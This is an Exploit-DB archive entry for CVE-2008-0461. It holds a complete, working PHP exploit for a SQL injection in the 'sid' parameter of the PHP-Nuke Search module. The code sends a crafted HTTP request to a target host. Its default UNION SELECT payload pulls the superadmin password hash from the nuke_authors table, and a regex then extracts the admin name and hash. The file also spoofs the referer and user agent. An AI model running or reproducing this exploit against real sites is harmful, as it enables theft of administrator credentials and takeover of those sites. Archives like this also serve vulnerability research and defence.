PHP-Nuke <= 8.0 Final sid Remote SQL Injection Exploit

2008-01-22T00:00:00
ID EDB-ID:4965
Type exploitdb
Reporter RST/GHC
Modified 2008-01-22T00:00:00

Description

PHP-Nuke <= 8.0 Final (sid) Remote SQL Injection Exploit. CVE-2008-0461. Webapps exploit for php platform

                                        
                                            &lt;?php
##########################################################
# UNPUBLISHED RST/GHC EXPLOIT
# PHP Nuke `sid` sql injection exploit for Search module
# POST method -
# the best for version 8.0 FINAL
# (c)oded by Foster & 1dt.w0lf
##########################################################
# tested on 6.0 , 6.6 , 7.9 , 8.0 FINAL versions
##########################################################

if (isset($_POST['Submit'])){
$result=sendit('CONCAT("::",aid,"::",pwd,"::")');
if (preg_match("/::([^:]*)::([a-f0-9]{32})::/",$result, $matches))
{$ahash = $matches[2]; $aname = $matches[1];}

}

function sendit($param){
$prefix = $_POST['prefix'];
$data = $_POST['sql_text'];
$host = $_POST['hostname'];
$page = (isset($_POST['dir'])) ? '/'.$_POST['dir'] : '';
$page .= '/modules.php?name=Search';
$method = $_POST['method'];
$ref_text = $_POST['ref_text'];
$user_agent = $_POST['user_agent'];
$result = '';
$sock = fsockopen($host, 80, $errno, $errstr, 50);
if (!$sock) die("$errstr ($errno)\n");
fputs($sock, "$method /$page HTTP/1.0\r\n");
fputs($sock, "Host: $host" . "\r\n");
fputs($sock, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($sock, "Content-length: " . strlen($data) . "\r\n");
fputs($sock, "Referer: $ref_text". "\r\n");
fputs($sock, "User-Agent: $user_agent" . "\r\n");
fputs($sock, "Accept: */*\r\n");
fputs($sock, "\r\n");
fputs($sock, "$data\r\n");
fputs($sock, "\r\n");

while (!feof($sock)) {
$result .= fgets ($sock,8192);
}
fclose($sock);
return $result;

}


?&gt;

&lt;head&gt;
&lt;meta http-equiv=Content-Type content="text/html; charset=windows-1251"&gt;
&lt;TITLE&gt;RST/GHC PHP Nuk'em exploit&lt;/TITLE&gt;
&lt;style&gt;
a:link{color: #000000; text-decoration: none;}
a:visited{color: #000000; text-decoration: none;}
a:hover,a:active{color:#e49a34; text-decoration:underline;}
table{color:#000000;font-family:verdana;font-size:8pt;}
.style2 {
color: #FFFFFF;
font-weight: bold;
}
.style3 {color: #E39930}
.style5 {color: #000000; font-weight: bold; }
&lt;/style&gt;
&lt;body bgcolor="#525254"&gt;
&lt;form method=post&gt;
&lt;p class="style2"&gt;&lt;font size="3" face="Arial, Helvetica, sans-serif"&gt;PHP Nuke &lt;span class="style3"&gt;QUERY MANIPULATOR&lt;/span&gt; based on &lt;font size="3" face="Arial, Helvetica, sans-serif"&gt;`sid` POST sql injection&lt;/font&gt; exploit for Search module &lt;/font&gt;&lt;/p&gt;
&lt;table width="900" border="0"&gt;
&lt;tr bgcolor="#FFFFFF"&gt;
&lt;td width="12%"&gt;&lt;strong&gt;&lt;font color="#000000" size="2" face="Arial, Helvetica, sans-serif"&gt;Parameter&lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td width="88%" bgcolor="#FFFFFF"&gt;&lt;span class="style5"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Value&lt;/font&gt;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&lt;strong&gt;&lt;font color="#000000" size="2" face="Arial, Helvetica, sans-serif"&gt;url
&lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;
&lt;input name="hostname" type="text" id="hostname" value="&lt;?=(isset($_POST['hostname'])) ? $_POST['hostname'] : 'nuke.cc'; ?&gt;"&gt;
&lt;/font&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&lt;strong&gt;&lt;font color="#000000" size="2" face="Arial, Helvetica, sans-serif"&gt;dir&lt;/font&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;
&lt;input name="dir" type="text" id="dir" value="&lt;?=(isset($_POST['dir'])) ? $_POST['dir'] : 'phpnuke'; ?&gt;"&gt;
&lt;/font&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&lt;strong&gt;&lt;font color="#000000" size="2" face="Arial, Helvetica, sans-serif"&gt;referer&lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;
&lt;input type="text" name="ref_text" value="&lt;?=(isset($_POST['ref_text'])) ? $_POST['ref_text'] : 'http://jihad.in.us'; ?&gt;" size="60"&gt;
&lt;/font&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;SQL query&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;
&lt;input type="text" name="sql_text" value="&lt;?=(isset($_POST['sql_text'])) ? $_POST['sql_text'] : 'query=AAA&topic=&category=0&author=&days=0&type=comments&sid=999999\'/**/UNION%20SELECT%20`pwd`%20as%20title%20FROM%20nuke_authors%20WHERE%20radminsuper=\'1'; ?&gt;" size="80"&gt;
&lt;/font&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&lt;strong&gt;&lt;font color="#000000" size="2" face="Arial, Helvetica, sans-serif"&gt;user
agent&lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;
&lt;input type="text" name="user_agent" value="&lt;?=(isset($_POST['user_agent'])) ? $_POST['user_agent'] : 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)'; ?&gt;" size="60"&gt;
&lt;/font&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&lt;strong&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;table prefix &lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;
&lt;input name="prefix" type="text" id="prefix" value="&lt;?=(isset($_POST['prefix'])) ? $_POST['prefix'] : 'nuke'; ?&gt;"&gt;
&lt;/font&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&lt;strong&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;method&lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&lt;select name="method" size="1" id="method"&gt;
&lt;option value="POST"&gt;POST&lt;/option&gt;
&lt;option value="GET"&gt;GET&lt;/option&gt;
&lt;/select&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td bgcolor="E39930"&gt;&nbsp;&lt;/td&gt;
&lt;td bgcolor="#999999"&gt;&nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;
&lt;input type="submit" name="Submit" value="rock-n-roll"&gt;
&lt;/p&gt;
&lt;/form&gt;




&lt;font size="2"&gt;(c) RST/GHC&lt;/font&gt;

&lt;hr size="3"&gt;
&lt;?
# DEBUG

print $result;
?&gt;

# milw0rm.com [2008-01-22]